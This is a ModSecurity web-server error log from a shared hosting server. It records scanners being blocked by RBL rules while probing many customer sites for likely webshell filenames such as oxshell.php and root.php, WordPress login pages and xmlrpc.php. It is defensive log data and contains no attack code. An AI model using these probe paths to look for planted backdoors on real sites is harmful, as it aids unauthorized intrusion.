[Tue May 26 17:34:32.177934 2026] [security2:error] [pid 891273:tid 891422] [client 45.154.98.150:55686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWMUMDEzZ8z3jtDm82whwAAABM"], referer: www.google.com
[Tue May 26 17:34:32.194260 2026] [security2:error] [pid 891273:tid 891490] [client 45.154.98.150:64023] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahWMT8DEzZ8z3jtDm82wZwAAAFc"], referer: www.google.com
[Tue May 26 17:34:32.349458 2026] [security2:error] [pid 894579:tid 894808] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMTwEtZWuWWBGzl__hCQAAAWs"]
[Tue May 26 17:34:32.388186 2026] [security2:error] [pid 891273:tid 891494] [client 45.154.98.150:57044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/bplpiptz.php"] [unique_id "ahWMUMDEzZ8z3jtDm82wkQAAAFs"], referer: www.google.com
[Tue May 26 17:34:32.537613 2026] [security2:error] [pid 891273:tid 891462] [client 45.154.98.150:64023] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahWMUMDEzZ8z3jtDm82wlAAAADs"], referer: www.google.com
[Tue May 26 17:34:32.590454 2026] [security2:error] [pid 894579:tid 894767] [client 20.196.127.68:1580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/goods.php"] [unique_id "ahWMUAEtZWuWWBGzl__hHgAAAUM"]
[Tue May 26 17:34:32.764029 2026] [security2:error] [pid 894579:tid 894737] [client 223.235.98.214:21252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMUAEtZWuWWBGzl__hJwAAASU"]
[Tue May 26 17:34:32.764274 2026] [security2:error] [pid 894579:tid 894737] [client 223.235.98.214:21252] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMUAEtZWuWWBGzl__hJwAAASU"]
[Tue May 26 17:34:32.920063 2026] [security2:error] [pid 894579:tid 894769] [client 45.154.98.150:58715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-plain.php"] [unique_id "ahWMUAEtZWuWWBGzl__hLwAAAUQ"], referer: www.google.com
[Tue May 26 17:34:33.176374 2026] [security2:error] [pid 891273:tid 891429] [client 20.196.127.68:1594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/g.php"] [unique_id "ahWMUcDEzZ8z3jtDm82wqAAAABo"]
[Tue May 26 17:34:33.227097 2026] [security2:error] [pid 894579:tid 894717] [client 45.154.98.150:53580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWMUQEtZWuWWBGzl__hNwAAARE"]
[Tue May 26 17:34:33.498613 2026] [security2:error] [pid 894579:tid 894723] [client 45.205.1.28:52342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gldmarsa.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahWMUQEtZWuWWBGzl__hPgAAARc"]
[Tue May 26 17:34:33.529436 2026] [security2:error] [pid 894579:tid 894805] [client 45.154.98.150:60760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/fhhobdpa.php"] [unique_id "ahWMUQEtZWuWWBGzl__hQgAAAWg"], referer: www.google.com
[Tue May 26 17:34:33.603028 2026] [security2:error] [pid 891273:tid 891476] [client 45.154.98.150:51958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWMUcDEzZ8z3jtDm82wugAAAEk"]
[Tue May 26 17:34:33.875858 2026] [security2:error] [pid 891273:tid 891443] [client 20.196.127.68:9226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/hplfuns.php"] [unique_id "ahWMUcDEzZ8z3jtDm82wxQAAACg"]
[Tue May 26 17:34:34.054564 2026] [security2:error] [pid 894579:tid 894823] [client 45.154.98.150:57758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWMUgEtZWuWWBGzl__hVQAAAXo"]
[Tue May 26 17:34:34.504405 2026] [security2:error] [pid 894579:tid 894735] [client 45.154.98.150:54976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWMUgEtZWuWWBGzl__hYQAAASM"]
[Tue May 26 17:34:34.508538 2026] [security2:error] [pid 891273:tid 891470] [client 20.196.127.68:3795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ioxi-o.php"] [unique_id "ahWMUsDEzZ8z3jtDm82w2AAAAEM"]
[Tue May 26 17:34:35.169472 2026] [security2:error] [pid 894579:tid 894832] [client 20.196.127.68:1158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/in.php"] [unique_id "ahWMUwEtZWuWWBGzl__hewAAAYM"]
[Tue May 26 17:34:35.186545 2026] [security2:error] [pid 894579:tid 894748] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMUgEtZWuWWBGzl__haQAAATA"]
[Tue May 26 17:34:35.774439 2026] [security2:error] [pid 891273:tid 891447] [client 20.196.127.68:15767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/info.php"] [unique_id "ahWMU8DEzZ8z3jtDm82w_wAAACw"]
[Tue May 26 17:34:36.439853 2026] [security2:error] [pid 894579:tid 894764] [client 20.196.127.68:2159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/inputs.php"] [unique_id "ahWMVAEtZWuWWBGzl__hoQAAAUA"]
[Tue May 26 17:34:36.923722 2026] [security2:error] [pid 891273:tid 891530] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMVMDEzZ8z3jtDm82xGAAAAH8"]
[Tue May 26 17:34:37.081294 2026] [security2:error] [pid 891273:tid 891475] [client 20.196.127.68:7622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/item.php"] [unique_id "ahWMVcDEzZ8z3jtDm82xKwAAAEg"]
[Tue May 26 17:34:37.391161 2026] [security2:error] [pid 894579:tid 894712] [client 31.57.184.20:53484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWMVQEtZWuWWBGzl__hvAAAAQw"]
[Tue May 26 17:34:37.765044 2026] [security2:error] [pid 894579:tid 894759] [client 20.196.127.68:4152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/k.php"] [unique_id "ahWMVQEtZWuWWBGzl__hzAAAATs"]
[Tue May 26 17:34:37.803870 2026] [security2:error] [pid 894579:tid 894719] [client 31.57.184.20:53836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWMVQEtZWuWWBGzl__hzgAAARM"], referer: https://wordpress.org/
[Tue May 26 17:34:38.388857 2026] [security2:error] [pid 894579:tid 894763] [client 20.196.127.68:9265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/license.php"] [unique_id "ahWMVgEtZWuWWBGzl__h4gAAAT8"]
[Tue May 26 17:34:39.026223 2026] [security2:error] [pid 891273:tid 891517] [client 20.196.127.68:1576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/load.php"] [unique_id "ahWMV8DEzZ8z3jtDm82xZgAAAHI"]
[Tue May 26 17:34:39.304296 2026] [security2:error] [pid 891273:tid 891411] [client 113.44.110.60:42330] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWMU8DEzZ8z3jtDm82w-wAACHo"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/9c93b12bc8cba040-9c93b12bc8cba040-combined.css
[Tue May 26 17:34:39.445779 2026] [security2:error] [pid 894579:tid 894744] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMVgEtZWuWWBGzl__h-QAAASw"]
[Tue May 26 17:34:39.632838 2026] [security2:error] [pid 891273:tid 891495] [client 20.196.127.68:9247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/manager.php"] [unique_id "ahWMV8DEzZ8z3jtDm82xewAAAFw"]
[Tue May 26 17:34:39.756476 2026] [security2:error] [pid 891273:tid 891403] [client 31.57.184.20:54716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWMV8DEzZ8z3jtDm82xgQAAAAA"], referer: https://www.google.com/
[Tue May 26 17:34:40.340221 2026] [security2:error] [pid 894579:tid 894758] [client 20.196.127.68:1536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/media.php"] [unique_id "ahWMWAEtZWuWWBGzl__iJQAAATo"]
[Tue May 26 17:34:40.931109 2026] [security2:error] [pid 891273:tid 891516] [client 20.196.127.68:4119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/mar.php"] [unique_id "ahWMWMDEzZ8z3jtDm82xoQAAAHE"]
[Tue May 26 17:34:41.214391 2026] [security2:error] [pid 894579:tid 894804] [client 142.111.70.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMWQEtZWuWWBGzl__iQAAAAWc"], referer: https://www.anujtradingco.com/
[Tue May 26 17:34:41.524193 2026] [security2:error] [pid 891273:tid 891465] [client 20.196.127.68:1592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/my1.php"] [unique_id "ahWMWcDEzZ8z3jtDm82xuAAAAD4"]
[Tue May 26 17:34:42.122980 2026] [security2:error] [pid 894579:tid 894739] [client 20.196.127.68:4142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/mm.php"] [unique_id "ahWMWgEtZWuWWBGzl__iTwAAASc"]
[Tue May 26 17:34:42.248658 2026] [security2:error] [pid 891273:tid 891487] [client 142.111.70.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMWsDEzZ8z3jtDm82x3gAAAFQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1238256&moderation-hash=71b673980e8e78f6fc097e84ca719778
[Tue May 26 17:34:42.303771 2026] [security2:error] [pid 891273:tid 891503] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMWcDEzZ8z3jtDm82xzwAAAGQ"]
[Tue May 26 17:34:42.760876 2026] [security2:error] [pid 894579:tid 894712] [client 20.196.127.68:2118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/network.php"] [unique_id "ahWMWgEtZWuWWBGzl__iYAAAAQw"]
[Tue May 26 17:34:43.479640 2026] [security2:error] [pid 894579:tid 894715] [client 20.196.127.68:9271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/new.php"] [unique_id "ahWMWwEtZWuWWBGzl__iaAAAAQ8"]
[Tue May 26 17:34:43.852380 2026] [security2:error] [pid 891273:tid 891488] [client 223.235.98.214:6225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMW8DEzZ8z3jtDm82yCwAAAFU"]
[Tue May 26 17:34:43.852548 2026] [security2:error] [pid 891273:tid 891488] [client 223.235.98.214:6225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMW8DEzZ8z3jtDm82yCwAAAFU"]
[Tue May 26 17:34:44.113264 2026] [security2:error] [pid 894579:tid 894741] [client 20.196.127.68:2322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/0x.php"] [unique_id "ahWMXAEtZWuWWBGzl__idgAAASk"]
[Tue May 26 17:34:44.665743 2026] [security2:error] [pid 894579:tid 894776] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMXAEtZWuWWBGzl__ifgAAAUs"]
[Tue May 26 17:34:44.725325 2026] [security2:error] [pid 894579:tid 894786] [client 20.196.127.68:2141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/0.php"] [unique_id "ahWMXAEtZWuWWBGzl__ilAAAAVU"]
[Tue May 26 17:34:45.293796 2026] [security2:error] [pid 894579:tid 894756] [client 142.111.70.41:46284] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWMXAEtZWuWWBGzl__ilgAAATg"], referer: https://anujtradingco.com
[Tue May 26 17:34:45.360078 2026] [security2:error] [pid 894579:tid 894821] [client 20.196.127.68:9229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/oxshell.php"] [unique_id "ahWMXQEtZWuWWBGzl__ipQAAAXg"]
[Tue May 26 17:34:45.955730 2026] [security2:error] [pid 891273:tid 891477] [client 20.196.127.68:4111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/php8.php"] [unique_id "ahWMXcDEzZ8z3jtDm82yTAAAAEo"]
[Tue May 26 17:34:46.556438 2026] [security2:error] [pid 894579:tid 894732] [client 20.196.127.68:7645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/p.php"] [unique_id "ahWMXgEtZWuWWBGzl__iwwAAASA"]
[Tue May 26 17:34:47.159872 2026] [security2:error] [pid 891273:tid 891478] [client 20.196.127.68:2356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/php.php"] [unique_id "ahWMX8DEzZ8z3jtDm82yeQAAAEs"]
[Tue May 26 17:34:47.488812 2026] [security2:error] [pid 894579:tid 894809] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMXwEtZWuWWBGzl__izgAAAWw"]
[Tue May 26 17:34:47.794486 2026] [security2:error] [pid 891273:tid 891407] [client 20.196.127.68:1548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/past.php"] [unique_id "ahWMX8DEzZ8z3jtDm82yjwAAAAQ"]
[Tue May 26 17:34:48.345244 2026] [security2:error] [pid 894579:tid 894778] [client 73.241.113.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMXwEtZWuWWBGzl__i3gAAAU0"]
[Tue May 26 17:34:48.382929 2026] [security2:error] [pid 891273:tid 891497] [client 20.196.127.68:2401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/root.php"] [unique_id "ahWMYMDEzZ8z3jtDm82ynQAAAF4"]
[Tue May 26 17:34:48.715287 2026] [security2:error] [pid 894579:tid 894836] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMYAEtZWuWWBGzl__i9AAAAYc"]
[Tue May 26 17:34:49.006097 2026] [security2:error] [pid 891273:tid 891443] [client 20.196.127.68:4097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/r.php"] [unique_id "ahWMYcDEzZ8z3jtDm82yrAAAACg"]
[Tue May 26 17:34:49.646192 2026] [security2:error] [pid 891273:tid 891519] [client 20.196.127.68:2335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/sid3.php"] [unique_id "ahWMYcDEzZ8z3jtDm82yywAAAHQ"]
[Tue May 26 17:34:50.232523 2026] [security2:error] [pid 894579:tid 894743] [client 20.196.127.68:2367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ss.php"] [unique_id "ahWMYgEtZWuWWBGzl__jIAAAASs"]
[Tue May 26 17:34:50.834217 2026] [security2:error] [pid 891273:tid 891504] [client 20.196.127.68:2305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/sts.php"] [unique_id "ahWMYsDEzZ8z3jtDm82y9QAAAGU"]
